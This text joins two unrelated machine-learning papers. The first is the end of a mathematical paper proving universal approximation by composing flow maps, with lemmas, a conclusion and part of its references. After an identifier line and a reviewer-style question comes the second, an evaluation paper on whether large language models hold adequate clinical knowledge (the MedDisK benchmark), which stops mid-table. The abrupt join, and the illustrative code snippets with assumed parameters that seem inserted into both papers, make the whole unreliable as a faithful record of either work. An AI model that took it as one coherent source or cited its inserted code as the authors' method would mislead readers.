Following the approach of Duan et al. (2022), we employ a proper splitting numerical scheme to discretize the neural ODE (27). Split the field $v$ into a sum of $Nd$ functions, $v(x, t) = \sum_{i=1}^{N} \sum_{j=1}^{d} v_{ij}(x, t)e_j$, where $e_j$ is the $j$-th unit coordinate vector and the $v_{ij}(x, t) = s_{ij}(t) \sigma(w_i(t) \cdot x + b_i(t))$ are scalar functions, with $s_{ij}$ the $j$-th component of $s_i$.
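Before stating the approximation guarantee for this scheme, the following sketch, our own illustration with arbitrary assumed parameter values, integrates a small neural ODE once with forward Euler on the full field and once with the coordinate-wise splitting just described, so that the closeness of the two endpoints can be checked numerically.

```python
import numpy as np

rng = np.random.default_rng(1)
d, N, tau, n = 2, 3, 1.0, 400            # dimension, hidden neurons, horizon, split steps
dt = tau / n
alpha = 0.2
sigma = lambda z: np.where(z >= 0, z, alpha * z)   # leaky-ReLU sigma_alpha

# Time-constant parameters for simplicity (the paper allows piecewise smooth t-dependence).
s = 0.3 * rng.standard_normal((N, d))
w = 0.3 * rng.standard_normal((N, d))
b = 0.3 * rng.standard_normal(N)
v = lambda x: sum(s[i] * sigma(w[i] @ x + b[i]) for i in range(N))

x0 = rng.standard_normal(d)
x_split, x_ref = x0.copy(), x0.copy()
for k in range(n):
    for i in range(N):
        for j in range(d):               # sub-step T_k^{(i,j)}: update coordinate j only
            x_split[j] += dt * s[i, j] * sigma(w[i] @ x_split + b[i])
    x_ref = x_ref + dt * v(x_ref)        # plain forward Euler on the full field
print("endpoint gap between splitting and reference:", np.linalg.norm(x_split - x_ref))
```

As $\Delta t \to 0$ the two trajectories converge to the same flow map, which is the content of the splitting theory invoked next.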
Then the numerical analysis of splitting methods (Holden et al., 2010) ensures that the following composition $\Phi$ can approximate $\phi^\tau$ provided the time step $\Delta t := \tau/n$ is sufficiently small,
$$\Phi = T_1 \bullet \cdots \bullet T_n \equiv (T_1^{(1,1)} \bullet T_1^{(1,2)} \bullet \cdots \bullet T_1^{(N,d)}) \bullet \cdots \bullet (T_n^{(1,1)} \bullet T_n^{(1,2)} \bullet \cdots \bullet T_n^{(N,d)}),$$
where the map $T_k^{(i,j)} : x \rightarrow y$ in each split step is
$$\begin{cases} y^{(l)} = x^{(l)}, & l \neq j, \\ y^{(j)} = x^{(j)} + \Delta t \, v_{ij}(x, k\Delta t). \end{cases}$$ (28)
Here, the superscript in $x^{(l)}$ indicates the $l$-th coordinate of $x$. The map $T_k^{(i,j)}$ is given by the forward Euler discretization of $x'(t) = v_{ij}(x(t), t)e_j$ on the interval $(k\Delta t, (k + 1)\Delta t)$. Note that $v_{ij}$ is Lipschitz continuous on $\mathbb{R}^d$, hence so is the map $T_k^{(i,j)}$. Below is the formal statement of the approximation in this step.

**Theorem 4.1.** Let $\Psi \in \text{Diff}_0(\Omega)$ be an orientation-preserving diffeomorphism and $\Omega \subset \mathbb{R}^d$ a compact domain. Then, for any $\varepsilon > 0$, there is a sequence of transformations $T_k^{(i,j)}$ of the form Eq. (28) such that
$$\| \Psi(x) - (T_1^{(1,1)} \bullet T_1^{(1,2)} \bullet \cdots \bullet T_1^{(N,d)} \bullet \cdots \bullet T_n^{(1,1)} \bullet T_n^{(1,2)} \bullet \cdots \bullet T_n^{(N,d)})(x) \| \leq \varepsilon, \quad \forall x \in \Omega.$$

### 4.2 Approximate Each Composition Component by Flow Maps in $H_1$ and $H_2$

Now we examine the map $T_k^{(i,j)}$ in each splitting step. Since all $T_k^{(i,j)}$ have the same structure (up to a permutation of coordinates), we only need to consider the case of $T_k^{(N,d)}$, which we simply denote by $T : x \rightarrow y$, of the form
$$T : \begin{cases} y^{(i)} = x^{(i)}, & i = 1, \cdots, d-1, \\ y^{(d)} = x^{(d)} + a \sigma(w_1 x^{(1)} + \cdots + w_d x^{(d)} + b), \end{cases}$$ (29)
where $\sigma = \sigma_\alpha$, $\alpha \in (0, 1)$, is the leaky-ReLU function and $a, b, w_1, ..., w_d \in \mathbb{R}$ are parameters. Since the time step $\Delta t$ in $T_k^{(i,j)}$ is small, we can assume the parameters satisfy $\max(1/\alpha, \alpha)|aw_d| < 1$.

**Lemma 4.2.** Let $\alpha > 0$ and $\max(1/\alpha, \alpha)|aw_d| < 1$. Then the map $T$ in Eq. (29) is a composition of at most six flow maps in $H_1 \cup H_2$.

Noting that the case of $w_1 = ... = w_{d-1} = 0$ is trivial, we can assume $w_1 \neq 0$ without loss of generality. Then the bias parameter $b$ can be absorbed into $x^{(1)}$ using an affine flow map; hence we only need to consider the case of $b = 0$. In addition, using the property of leaky-ReLU, $\sigma_\alpha(x) = -\alpha \sigma_{1/\alpha}(-x)$, we can further assume $w_1 > 0$.
As a result, the map $T$ can be represented by the following composition,
$$T(x) = F_0 \bullet F_1 \bullet \cdots \bullet F_5(x),$$ (30)
where each composition step is as follows:
$$\begin{pmatrix} x^{(1)} \\ x^{(2:d-1)} \\ x^{(d)} \end{pmatrix} \xrightarrow{F_0} \begin{pmatrix} \nu \\ x^{(2:d-1)} \\ x^{(d)} \end{pmatrix} \xrightarrow{F_1} \begin{pmatrix} \sigma(\nu) \\ x^{(2:d-1)} \\ x^{(d)} \end{pmatrix} \xrightarrow{F_2} \begin{pmatrix} \sigma(\nu) \\ x^{(2:d-1)} \\ x^{(d)} + a\sigma(\nu) \end{pmatrix} \xrightarrow{F_3} \begin{pmatrix} \nu \\ x^{(2:d-1)} \\ x^{(d)} + a\sigma(\nu) \end{pmatrix} \xrightarrow{F_4} \begin{pmatrix} \nu + w_d a \sigma(\nu) \\ x^{(2:d-1)} \\ x^{(d)} + a\sigma(\nu) \end{pmatrix} \xrightarrow{F_5} \begin{pmatrix} x^{(1)} \\ x^{(2:d-1)} \\ x^{(d)} + a\sigma(\nu) \end{pmatrix}.$$
Here, $\nu := w_1 x^{(1)} + \cdots + w_d x^{(d)}$ and $x^{(2:d-1)}$ denotes the elements $x^{(2)}, \ldots, x^{(d-1)}$. We now verify that each component $F_i$, $i = 0, \cdots, 5$, is a flow map in $H_1 \cup H_2$. In fact, $F_0$, $F_2$, and $F_5 = F_0^{-1}$ are affine mappings,
$$F_0(x) = \begin{pmatrix} w_1 & w_{2:d} \\ 0 & I_{d-1} \end{pmatrix} x, \quad F_2(x) = \begin{pmatrix} I_{d-1} & 0 \\ (a, 0_{2:d-1}) & 1 \end{pmatrix} x, \quad F_5(x) = \begin{pmatrix} 1/w_1 & -w_{2:d}/w_1 \\ 0 & I_{d-1} \end{pmatrix} x,$$
where $I_{d-1}$ is the identity matrix and $(a, 0_{2:d-1}) = (a, 0, \ldots, 0)$ with $d-2$ zeros. According to Proposition 3.1, they are flow maps in $H_1$. In addition, according to Proposition 3.2, $F_1$, $F_3$, and $F_4$ are leaky-ReLU flow maps in $H_2$, as
$$F_1 = \Sigma_{(\alpha, 1_{2:d}), 1_{1:d}}, \quad F_3 = \Sigma_{(1/\alpha, 1_{2:d}), 1_{1:d}}, \quad F_4 = \Sigma_{(1+w_d a \alpha, 1_{2:d}), (1+w_d a, 1_{2:d})}.$$
Here, the condition $\max(1/\alpha, \alpha)|aw_d| < 1$ is used to ensure $1 + w_d a \alpha > 0$ and $1 + w_d a > 0$.

### 4.3 Finish the construction

Combining Theorem 4.1 and Lemma 4.2 above, and using Lemma 2.7, we obtain the following result.

**Theorem 4.3.** Let $\Psi \in \text{Diff}_0(\Omega)$ be an orientation-preserving diffeomorphism and $\Omega \subset \mathbb{R}^d$ a compact domain. Then, for any $\varepsilon > 0$, there is a sequence of flow maps $h_1, h_2, \ldots, h_m$, $m \in \mathbb{Z}_+$, in $H = H_1 \cup H_2$ such that
$$\|\Psi(x) - (h_1 \bullet h_2 \bullet \ldots \bullet h_m)(x)\| \leq \varepsilon, \quad \forall x \in \Omega.$$

We can then finish the construction for Theorem 2.6 by combining Corollary 3.7 and Theorem 4.3.

### 5 Conclusion

Universal approximation properties are a foundation of machine learning. This paper examined the approximation property of mapping compositions from a sequential perspective. We proved, for the first time, that universal approximation of diffeomorphisms and high-dimensional continuous functions can be achieved by sequentially composing mappings drawn from a finite vocabulary. Our result shows that universal approximation can be achieved with a remarkably small set of building blocks. Importantly, the mappings used in our composition are flow maps of dynamical systems and do not increase the dimension. However, our result is restricted to mappings on a compact domain; it would be interesting to study whether it can be generalized to mappings on unbounded domains.
Our Theorem 2.2 was inspired by the fact that natural languages have finite vocabularies: $V$ plays the role of a "vocabulary", the maps in $H_1$ and $H_2$ of "phrases", and those in $H_V$ of "sentences". Our results provide a novel perspective on composite mappings, and we hope our findings can in turn inspire related research in the algorithm and modeling communities. For example, one could embed words as nonlinear mappings instead of the vectors or matrices used in traditional models. However, constructing such embedding models involves many techniques beyond the scope of this paper.

It should be noted that this paper focuses on the existence of a finite vocabulary, and the constructed $V$ in Eq. (8) is not optimal. If a sequential composition of mappings in such a $V$ is used to approximate functions in practical applications, the required sequence length may be extremely large. In practice, however, it is often only necessary to approximate a certain small set of continuous functions, hence designing an efficient vocabulary for them would be a fascinating direction for future work.

REFERENCES

A. A. Agrachev and M. Caponigro. Dynamics control by a time-varying feedback. *Journal of Dynamical and Control Systems*, 16(2):149–162, 2010.

Tom M. Apostol. Kronecker's theorem with applications. In *Modular Functions and Dirichlet Series in Number Theory*, Graduate Texts in Mathematics, pp. 142–160. Springer, New York, NY, 1990.

David K. Arrowsmith and Colin M. Place. *An Introduction to Dynamical Systems*. Cambridge University Press, 1990.

Shima Asaadi, Eugenie Giesbrecht, and Sebastian Rudolph. Compositional matrix-space models of language: Definitions, properties, and learning methods. *Natural Language Engineering*, 29(1):32–80, 2023.

Hans-Peter Beise and Steve Dias Da Cruz. Expressiveness of neural networks having width equal or below the input dimension. *arXiv preprint arXiv:2011.04923*, 2020.

Yann Brenier and Wilfrid Gangbo. $L^p$ approximation of maps by diffeomorphisms. *Calculus of Variations and Partial Differential Equations*, 16(2):147–164, 2003.

Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D. Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, and Amanda Askell. Language models are few-shot learners. In *Advances in Neural Information Processing Systems*, volume 33, pp. 1877–1901, 2020.

Yongqiang Cai. Achieve the minimum width of neural networks for universal approximation. *arXiv preprint arXiv:2209.11395*, 2022.

Marco Caponigro. Orientation preserving diffeomorphisms and flows of control-affine systems. *IFAC Proceedings Volumes*, 44(1):8016–8021, 2011.

Lili Chen, Kevin Lu, Aravind Rajeswaran, Kimin Lee, Aditya Grover, Misha Laskin, Pieter Abbeel, Aravind Srinivas, and Igor Mordatch. Decision transformer: Reinforcement learning via sequence modeling. *Advances in Neural Information Processing Systems*, 34:15084–15097, 2021.

Ricky T. Q. Chen, Yulia Rubanova, Jesse Bettencourt, and David Duvenaud. Neural ordinary differential equations. In *Proceedings of the 32nd International Conference on Neural Information Processing Systems*, pp. 6572–6583, 2018.

Walter J. Culver. On the existence and uniqueness of the real logarithm of a matrix. *Proceedings of the American Mathematical Society*, 17(5):1146–1151, 1966.

George Cybenko. Approximation by superpositions of a sigmoidal function. *Mathematics of Control, Signals and Systems*, 2(4):303–314, 1989.
Verna Dankers, Elia Bruni, and Dieuwke Hupkes. The paradox of the compositionality of natural language: A neural machine translation case study. In *Proceedings of the 60th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers)*, pp. 4154–4175. Association for Computational Linguistics, 2022.

Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: Pre-training of deep bidirectional transformers for language understanding. *arXiv preprint arXiv:1810.04805*, 2018.

Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, Jakob Uszkoreit, and Neil Houlsby. An image is worth 16x16 words: Transformers for image recognition at scale. In *International Conference on Learning Representations*, 2021.

Yifei Duan, Li'ang Li, Guanghua Ji, and Yongqiang Cai. Vanilla feedforward neural networks as a discretization of dynamic systems. *arXiv preprint*, 2022.
gYcft1HIaU
Would it be considered a correct hit if the model predicts 'GI tract' instead of 'digestive system' in the examples from Table 3? What kind of standardization was performed when evaluating LLMs' responses against the experts' output?
DO CURRENT LARGE LANGUAGE MODELS MASTER ADEQUATE CLINICAL KNOWLEDGE?

Anonymous authors Paper under double-blind review

ABSTRACT

Large Language Models (LLMs) show promising potential in solving clinical problems. Current LLMs, including so-called medical LLMs, are reported to achieve excellent performance on certain medical evaluation benchmarks, such as medical question answering, medical exams, etc. However, such evaluations cannot assess whether LLMs have mastered the sufficient, comprehensive, and necessary medical knowledge required for solving real clinical problems, such as clinical diagnostic assistance. In this paper, we propose a framework to assess the mastery of LLMs in clinical knowledge. Firstly, we construct a large medical disease-based knowledge base, MedDisK, covering 10,632 common diseases across 18 clinical knowledge aspects, which are crucial for diagnosing and treating diseases. Built on that, we propose a MedDisK-based evaluation method, MedDisKEval: we prompt LLMs to retrieve information related to these clinical knowledge aspects. Then, we evaluate an LLM's mastery of medical knowledge by measuring the similarity between the LLM-generated information and the content within our knowledge base. Our experimental findings reveal that over 50% of the clinical information generated by the evaluated LLMs is significantly inconsistent with the corresponding knowledge stored in our knowledge base. We further perform a significance analysis to compare the performance of medical LLMs with their backbone models, discovering that 5 out of 6 medical LLMs perform less effectively than their backbone models in over half of the clinical knowledge aspects. These observations demonstrate that existing LLMs have not mastered adequate knowledge for clinical practice. Our findings offer novel and constructive insights for the advancement of medical LLMs.

1 INTRODUCTION

In recent years, advancements in Large Language Models (LLMs) have shown potential across various domains, including the medical domain. Several foundation LLMs like ChatGPT (Ouyang et al., 2022) and LLaMA (Touvron et al., 2023) have been noted for their outstanding performance on various medical evaluation benchmarks, including the USMLE (United States Medical Licensing Examination) (Kung et al., 2023), the medical sections of MMLU (Hendrycks et al., 2020), MedQA (Jin et al., 2021), and PubMedQA (Jin et al., 2019). However, directly applying general-purpose LLMs to the medical domain may not be suitable, due to their lack of specialized training on medical corpora and potential deficits in professional expertise within the medical field. To address this gap, researchers have proposed several LLMs (Li et al., 2023; Wang et al., 2023; Chen et al., 2023; Zhang et al., 2023; Xiong et al., 2023; Singhal et al., 2023a) tailored for medical applications, known as "medical LLMs". Some of these models are claimed to outperform general LLMs like ChatGPT in specific medical tasks, such as medical dialogue and medical question answering.

However, does the excellent performance achieved on these medical benchmarks and tasks indicate that current LLMs, both general and medical, master adequate knowledge for solving real clinical problems? To answer this question, we need to take a thorough look at existing medical evaluation benchmarks. The existing medical evaluation benchmarks are predominantly based on question-answering (QA) tasks.
These benchmarks collect questions from diverse sources, including medical examinations, electronic health records, online resources, and expert crafting. While these QA-based evaluation benchmarks are effective for assessing LLM performance, they cannot answer whether LLMs have mastered sufficient medical knowledge for solving real clinical problems. This is because current QA-based medical evaluation datasets cover only some common diseases and lack extensive coverage of knowledge across the various aspects of diseases. Therefore, the performance of LLMs on these medical QA datasets cannot accurately reflect the extent to which they cover knowledge about different diseases and their various knowledge aspects. Moreover, answering questions involves three distinct skills: understanding the question, mastering the relevant knowledge, and applying that knowledge for reasoning. The performance of LLMs on QA datasets is therefore jointly determined by these three skills and does not directly reflect their mastery of clinical knowledge. Furthermore, some of these benchmarks are available online and may be inadvertently included in the training sets of some LLMs by web crawlers or similar tools used by LLM developers. Such data leakage may lead to unfair comparisons.

To address these shortcomings, we present in this paper a novel framework to probe whether LLMs have mastered comprehensive medical knowledge for real clinical challenges. Figure 1 presents an overview of this framework. To begin, we construct a large-scale medical disease-based knowledge base, MedDisK, encompassing 10,632 common diseases and 18 clinical knowledge aspects necessary for diagnosing and treating diseases, such as primary symptoms, surgical procedures, and medications. Built on that, we propose a MedDisK-based evaluation method, MedDisKEval: LLMs are first prompted to recall information for the knowledge aspects defined in our knowledge base, such as "the primary symptoms of viral URI are ..." and "the anatomical sites of diabetes are ...". The LLM's mastery of clinical knowledge is then probed by measuring the similarity between the LLM-generated disease information and the content within our knowledge base.

We perform the proposed evaluation on a total of 12 general and medical LLMs. Our experimental results indicate that more than 50% of the disease-related information generated by all the evaluated LLMs exhibits significant inconsistencies with the content of our knowledge base (see Figure 4). These results answer the question raised above: none of the current LLMs have yet mastered adequate clinical knowledge. Additionally, we observe that 5 out of 6 medical LLMs achieve inferior performance compared to their backbone models in over half of the clinical knowledge aspects. This implies that the training methods applied in current medical LLMs may not consistently enhance the mastery of clinical knowledge and could potentially result in catastrophic forgetting in some knowledge aspects. To ensure the timeliness of this evaluation framework while guarding against data leaks, we will not release the complete medical knowledge base. Nevertheless, we will make data samples and an evaluation interface available at [URL to be released] to promote further research.
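As a concrete, hypothetical illustration of the retrieval step of this pipeline (the exact expert-crafted instructions appear in Appendix C), a few-shot prompt for one disease and one knowledge aspect could be assembled as follows; the wording, the example pairs, and the `query_llm` and `post_process` helpers are illustrative assumptions, not the actual implementation.

```python
def build_prompt(disease: str, aspect: str, examples: list) -> str:
    """Assemble a few-shot prompt asking an LLM to recall one clinical knowledge aspect."""
    lines = [f"The {aspect} of {d} are: {r}" for d, r in examples]  # five demonstrations in practice
    lines.append(f"The {aspect} of {disease} are:")
    return "\n".join(lines)

# Hypothetical demonstration pairs; the real prompts are expert-crafted and in Chinese.
examples = [("influenza", "fever; cough; sore throat")]
prompt = build_prompt("type 2 diabetes", "primary symptoms", examples)
# response = query_llm(prompt)                     # hypothetical call to the model under test
# triplet = ("type 2 diabetes", "primary symptoms", post_process(response))
```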
Our contributions are summarized as follows:

- We propose a large-scale medical disease-based knowledge base, MedDisK, covering 10,632 common diseases and 18 clinical knowledge aspects that are crucial for diagnosing and treating diseases.
- Built on that, we introduce a MedDisK-based evaluation method, MedDisKEval, to probe LLMs' mastery of clinical knowledge.
- Employing the proposed clinical knowledge base, we conduct an extensive evaluation of 12 LLMs to assess their clinical knowledge mastery. Our experimental results demonstrate that none of the evaluated LLMs have mastered sufficient knowledge to handle real clinical problems effectively. Further analysis indicates that most current medical LLMs do not significantly surpass their backbone models in medical knowledge mastery.

2 RELATED WORKS

**Medical Large Language Models** Current medical LLMs can be divided into two categories. One category applies supervised finetuning to general backbone models using medical question answering (Singhal et al., 2023b), multi-turn medical dialogues (Zhang et al., 2023; Chen et al., 2023), data generated by LLMs (Wang et al., 2023; Li et al., 2023; Xiong et al., 2023), or a hybrid of general and medical data (OpenMEDLab, 2023). The other category, represented by PMC-LLaMA (Wu et al., 2023), conducts further pretraining on medical corpora. We primarily evaluate LLMs in the first category, since only a few models fall in the second category. Moreover, our evaluation is based on a Chinese clinical knowledge base, and the models in the second category showed poor Chinese language capabilities in our preliminary experiments.

**Medical Evaluation Benchmarks** Existing medical LLMs are evaluated with question-answering (QA) tasks, including multi-choice QA (Jin et al., 2021; 2019) and open-ended QA (Singhal et al., 2023a; He et al., 2019). Though QA tasks have been demonstrated to be effective tools for evaluating LLMs' capabilities, they have limitations in measuring LLMs' medical knowledge mastery. Therefore, we propose a disease-knowledge-based evaluation that probes LLMs' proficiency in clinical knowledge. When scoring open-ended QA, automated metrics (Papineni et al., 2002; Lin, 2004; Zhang et al., 2019) are widely used but may not align well with human judgments. LLMs (OpenMEDLab, 2023) or human experts (Singhal et al., 2023b) are also employed, though they incur significant costs for comprehensive assessments. Therefore, we introduce a low-cost, expert-aligned automated scoring method that produces scores consistent with expert assessment.

**Knowledge-graph-based Language Model Evaluation** Some prior studies (Petroni et al., 2019; Sung et al., 2021) assess language models like BERT (Devlin et al., 2018) and BioBERT (Lee et al., 2020) by completing triples in knowledge graphs. While these studies probe LMs' knowledge in the general and biomedical domains, we focus on probing larger LMs in the clinical domain. We employ a large-scale clinical knowledge base including 10,632 diseases across 18 attributes to evaluate the clinical knowledge mastery of 12 LLMs.

3 METHODS

In this section, we present the framework to assess whether LLMs have mastered comprehensive medical knowledge for real clinical diagnosis and medical decisions, by first introducing the large-scale medical disease-based knowledge base MedDisK in Section 3.1 and then the MedDisK-based evaluation method MedDisKEval in Section 3.2.
3.1 MedDisK: LARGE-SCALE MEDICAL DISEASE-BASED KNOWLEDGE BASE

Disease-based clinical knowledge is of utmost importance: it is crucial for making accurate clinical diagnoses, conducting appropriate examinations, implementing effective treatments, and other medical decision-making. Therefore, we construct a large-scale medical disease-based knowledge base, MedDisK, to evaluate LLMs. To make the evaluation effective, MedDisK must satisfy the following properties: (1) it includes a large number of common diseases; (2) it involves rich disease-based knowledge; (3) it is accurate and not publicly accessible (avoiding implicit data leakage that would reduce the evaluation to a test on training data).

To achieve this, we employ an ICD-10-based method to construct MedDisK, as presented in Figure 2. ICD-10 was developed by the World Health Organization (WHO) and covers nearly all diagnosable diseases and related health problems. We first select a subset of the ICD-10 database according to whether the diseases are common in clinical practice (as determined by clinical experts) and statistically frequent in Electronic Health Records (EHRs), resulting in 10,632 common diseases. Then, we employ clinical experts to define 18 disease-based clinical knowledge aspects (Table 1) that are crucial to medical decision-making (diagnoses, examinations, treatments). Finally, MedDisK, including the 10,632 common diseases and their corresponding 18 aspects of clinical knowledge, is constructed through a collaborative effort between clinical experts and machine assistance. The annotation by clinical experts ensures the accuracy, professionalism, and completeness of the knowledge in MedDisK. The whole process involved the dedicated efforts of 20 clinical experts over about 10 months. More details of the MedDisK construction and a comparison with existing QA evaluation datasets are provided in Appendix A.

### 3.2 MedDisKEval: Disease-Knowledge-based LLMs Evaluation

#### 3.2.1 Disease-Oriented Clinical Knowledge Retrieval

We employ different prompting strategies for different categories of LLMs to extract disease-related information for each clinical knowledge aspect individually. For pretraining-only models (not finetuned on instructions), we apply the few-shot learning strategy used in existing benchmarks such as MMLU, generating prompts with five demonstrative examples. We found in experiments that five examples suffice to activate the few-shot capability of LLMs. For models finetuned on instructions, we collaborate closely with clinical experts to craft tailored instructions for each knowledge aspect. These instructions are added before the few-shot examples, acknowledging that these models may achieve suboptimal performance without instructions. Each instruction is designed to introduce the relevant knowledge aspect and guide the format of the LLM's output accordingly, undergoing multiple iterations to achieve optimal generation results. We provide prompt examples and all the instructions in Appendix B and Appendix C, respectively.

After generation, we post-process LLM responses to remove noise and format them according to three types of clinical knowledge aspects: (1) enumerated type (a list of entities); (2) declarative type (unstructured text); (3) numeric type. We first apply heuristic rules to extract related segments and filter out irrelevant content from LLMs' responses. Afterward, we leverage different methods to format the responses for the different types of knowledge aspects.
For the enumerated type, we employ a specialized NER model to identify and extract medical entities from the text. For the numeric type, we extract the first number in the text and return NaN if no number is found. We do not format responses of the declarative type, as they inherently assume a textual form. We denote each piece of post-processed information as a triplet $(d, a, r)$, where $d$ is the corresponding disease, $a$ is the involved clinical knowledge aspect, and $r$ is the LLM's post-processed information. We provide more details of the post-processing and the NER model in Appendix D and Appendix E.

### 3.2.2 Expert-Aligned Knowledge Scoring

The proposed expert-aligned knowledge scoring process includes two steps: **disease-knowledge-based automated scoring**, which assesses the similarity between LLM-generated information and the content within our knowledge base using automated metrics, and **expert-aligned grading**, which aligns the automated scores with expert assessment, yielding results that are more easily interpretable.

**Disease-Knowledge-based Automated Scoring** We employ automated evaluation metrics to measure the similarity between LLM-generated information and the content within our knowledge base. First, for each piece of LLM-generated information $(d, a, r)$, we retrieve the corresponding triplet $(d, a, \hat{r})$ from our knowledge base. Then, the similarity is calculated as $s = \text{sim}(r, \hat{r})$, where $\text{sim}$ is an evaluation metric that varies according to the type of the knowledge aspect $a$. For the declarative type, we apply both token-level metrics, namely BLEU-1 (Papineni et al., 2002) and ROUGE-1 (Lin, 2004) (f1-score), and a sentence-level metric, cosine similarity, based on the Chinese text embedding model M3E (Wang Yuxin, 2023). We explored alternative metrics like BERTScore (Zhang et al., 2019) but found that their scores achieve lower consistency with expert assessment (see Appendix F). For the enumerated type, considering computational complexity, we adopt a straightforward approach: we concatenate the entities with blank spaces and apply the same metrics as for the declarative type. For the numeric type, we evaluate with the hard match score $1_{r=\hat{r}}$, as our knowledge base includes only one numerical aspect (Severity Level), where distinct numbers correspond to different categories.

**Expert-aligned Grading** The disease-knowledge-based automated scoring method offers objective but less interpretable scores of clinical knowledge mastery: the scores are not inherently aligned with the subjective assessments of clinical experts. Furthermore, variations in the types of knowledge aspects can introduce disparities in score distributions, thus constraining comprehensive analysis across aspects. As a solution, we develop an expert-aligned grading approach that categorizes consistency scores into distinct levels, facilitating interpretable comparisons and cross-aspect analysis. The grading process is illustrated in Figure 3. We first conduct interval sampling on all the scoring results across LLMs.
Subsequently, we engage clinical experts to categorize LLMs' responses into multiple tiers aligned with their expert judgment, and to determine the optimal grading standard (score thresholds) that divides the results into these tiers:

• **Completely Wrong**: the LLM-generated information $r$ has a significant inconsistency or conflict with the ground truth $\hat{r}$, or is even irrelevant to the aspect $a$.
• **Partially Correct**: the LLM-generated information $r$ contains some accurate information mentioned in $\hat{r}$ but may also include some incorrect or incomplete information.
• **Basically Correct**: the LLM-generated information $r$ is mostly in agreement with the ground truth $\hat{r}$. There might be minor errors or incompleteness, but the consistency is high.

Figure 3: Expert-Aligned Knowledge Scoring

Specifically, we determine a grading standard for each combination of metric (ROUGE-1, BLEU-1, and cosine similarity) and type (enumerated and declarative). For each combination, we set a score interval of 0.1 and sample 10 examples from each interval, where each example consists of $d$, $a$, $r$, $\hat{r}$, and a similarity score $s$. For the numeric type (Severity Level in our case), we directly map the score 1 to "Basically Correct" and the score 0 to "Completely Wrong," as it has only two possible values. Ultimately, the clinical knowledge mastery of an LLM can be reflected by the proportion of LLM-generated information in these three tiers. More details are presented in Appendix G.

To validate the alignment between the proposed expert-aligned automated grading and expert evaluation, we assign clinical experts to annotate another 150 randomly selected instances. Each instance includes a disease $d$, a knowledge aspect $a$, information from an LLM ($r$), and $\hat{r}$ from our knowledge base. The tiers "Completely Wrong," "Partially Correct," and "Basically Correct" are mapped to scores of 0, 1, and 2, respectively. We employ Spearman correlation coefficients to measure the consistency and summarize the results in Table 2.

| Metrics | Correlation With Clinical Experts |
|------------------|-----------------------------------|
| BLEU-1 | 0.722* |
| ROUGE-1 | 0.779* |
| Cosine Similarity| 0.805* |
| Average | 0.837* |

Table 2: Consistency between the results of MedDisKEval and clinical experts across metrics, measured by Spearman correlation coefficients. Asterisks indicate that the correlations are significant.

All three metrics achieve correlation coefficients surpassing 0.7, indicating high consistency between the proposed automated grading and the expert assessment. Cosine similarity correlates more strongly with expert assessments than the other two metrics. However, we find that the average score of the three metrics after grading achieves a stronger correlation than any single metric (Table 2), indicating that the three metrics complement each other in our evaluation. Therefore, we use all three metrics for a comprehensive evaluation.
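As a concrete illustration of the scoring-plus-grading procedure described in this section, the sketch below scores one declarative triplet and maps the score to a tier; the `token_f1` stand-in for the ROUGE-1 f-score and the threshold values are our assumptions, not the calibrated grading standard determined by the clinical experts.

```python
import numpy as np

def cosine_similarity(u: np.ndarray, v: np.ndarray) -> float:
    """Sentence-level similarity between two embedding vectors (e.g., from M3E)."""
    return float(u @ v / (np.linalg.norm(u) * np.linalg.norm(v)))

def token_f1(pred: str, ref: str) -> float:
    """Unigram-overlap F1, a rough stand-in for the ROUGE-1 f-score."""
    p, r = set(pred.split()), set(ref.split())
    overlap = len(p & r)
    if not overlap:
        return 0.0
    prec, rec = overlap / len(p), overlap / len(r)
    return 2 * prec * rec / (prec + rec)

def grade(score: float, thresholds=(0.4, 0.7)) -> str:
    """Map a similarity score to a tier; the real thresholds were expert-calibrated."""
    if score < thresholds[0]:
        return "Completely Wrong"
    if score < thresholds[1]:
        return "Partially Correct"
    return "Basically Correct"

# One declarative triplet (d, a, r) scored against the knowledge-base entry r_hat:
r, r_hat = "digestive system", "digestive system"
print(grade(token_f1(r, r_hat)))   # -> "Basically Correct"
```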
4 EVALUATION

4.1 EVALUATED LLMs

As mentioned above, we evaluate two types of LLMs in our experiments: (1) LLMs pretrained and finetuned in the general domain: GPT-3.5-turbo (Ouyang et al., 2022), Bloomz-7.1B-mt (Muennighoff et al., 2023), LLaMA-7B (Touvron et al., 2023), Vicuna-7B (Zheng et al., 2023), ChatGLM-6B (Du et al., 2022), and Baichuan-7B (Yang et al., 2023); (2) LLMs further finetuned on medical data: ChatDoctor (Li et al., 2023), DoctorGLM (Xiong et al., 2023), BenTsao (huatuo-llama-med-chinese) (Wang et al., 2023), HuatuoGPT (Zhang et al., 2023), BianQue-2 (Chen et al., 2023), and PULSE (OpenMEDLab, 2023). These LLMs are selected based on a comprehensive consideration of computational power, evaluation cost, and model availability. To ensure a fair comparison, we keep the text generation parameters of the LLMs at the defaults in their respective GitHub or HuggingFace repositories.

4.2 RESULTS

4.2.1 OVERALL PERFORMANCE

The upper part of Figure 4 depicts the distribution of all LLMs' responses across the three metrics within the three tiers defined in Section 3.2.2. These three sub-figures reveal the overall performance of current LLMs on clinical knowledge mastery. Our findings point to a striking revelation: over 50% of the responses generated by current LLMs are classified as "Completely Wrong," approximately 30% fall under "Partially Correct," and merely fewer than 20% are deemed "Basically Correct." These results show that the clinical knowledge mastery of existing LLMs is far from adequate for addressing real-world clinical challenges. The distributions of the three metrics exhibit similar trends while varying in detailed proportions, highlighting the importance of utilizing multiple metrics in our evaluation. We provide examples of LLMs' responses within the three tiers in Table 3; the degree of clinical knowledge mastery shown in these responses corresponds closely with the tiers assigned by our method.

Figure 4: Upper: Distribution of LLMs' responses across three metrics. Lower: Distribution of responses across 12 LLMs and three metrics. We denote Bloomz-7.1B-mt as Bloomz-7B for name consistency with the other models. Models with the same backbone model are illustrated with similar colors. We use slashes to denote the base models within each model series.

| Tier | Disease | Knowledge Aspect | Ground Truth | LLM Response |
|--------------------|----------------------------------------------|------------------|---------------------------------------|--------------|
| Completely Wrong | rheumatoid arthritis of the hand interphalangeal joints | patient population | higher prevalence in females; middle-age; elderly | ok, I see. |
| Partially Correct | tracheobronchial amyloidosis | affected sites | trachea; bronchi; lung | lung; chest |
